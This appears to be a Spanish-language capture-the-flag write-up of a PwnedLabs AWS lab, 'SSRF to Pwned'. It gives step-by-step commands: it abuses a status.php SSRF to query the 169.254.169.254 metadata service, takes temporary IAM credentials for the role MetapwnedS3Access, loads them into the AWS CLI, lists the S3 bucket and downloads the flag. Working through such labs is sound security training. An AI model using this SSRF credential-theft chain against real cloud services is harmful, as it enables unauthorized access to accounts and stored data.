SSRF to Pwned

SSRF to Pwned


Aws PwnedLabs

Vemos la pagina web que se entrega al principio del laboratorio.

whatweb http://app.huge-logistics.com

ssh_command.

cloud_enum -k "huge-logistics.com" --disable-azure --disable-gcp

Trato de hacer un cloud_enum con la pagina pero no tengo resultados.

ssh_command.

En la pagina veo la direccion del bucket.

ssh_command.

Hago un curl.

curl -I http://app.huge-logistics.com/

ssh_command.

169.254.169.254/latest/meta-data/iam/info

Intentemos explotar la vulnerabilidad SSRF solicitando la dirección IP de enlace local 169.254.169.254 que aloja el servicio de metadatos.

ssh_command.

curl -s https://app.huge-logistics.com/status/status.php?name=169.254.169.254/latest/meta-data/iam/info |awk '/^{/{flag=1} flag; /^}/{flag=0}' | jq

Hacemos otro curl a la direccion y encontramos lo siguiente:

ssh_command.

Ahora con MetapwnedS3Access.

curl -s https://app.huge-logistics.com/status/status.php?name=169.254.169.254/latest/meta-data/iam/security-credentials/MetapwnedS3Access|awk '/^{/{flag=1} flag; /^}/{flag=0}' | jq

ssh_command.

aws configure

Metemos la informacion para configurar nuestro usuario.

aws sts get-caller-identity

Hacemos un tipo whoami de aws.

ssh_command.

Tratamos de ver que archivos tenemos en el bucket.

aws s3 ls huge-logistics-storage --recursive

ssh_command.

Vemos que se encuentra el flag.

aws s3 cp s3://huge-logistics-storage/backup/flag.txt .

batcat flag.txt

ssh_command.

© 2026 Cu3rv0x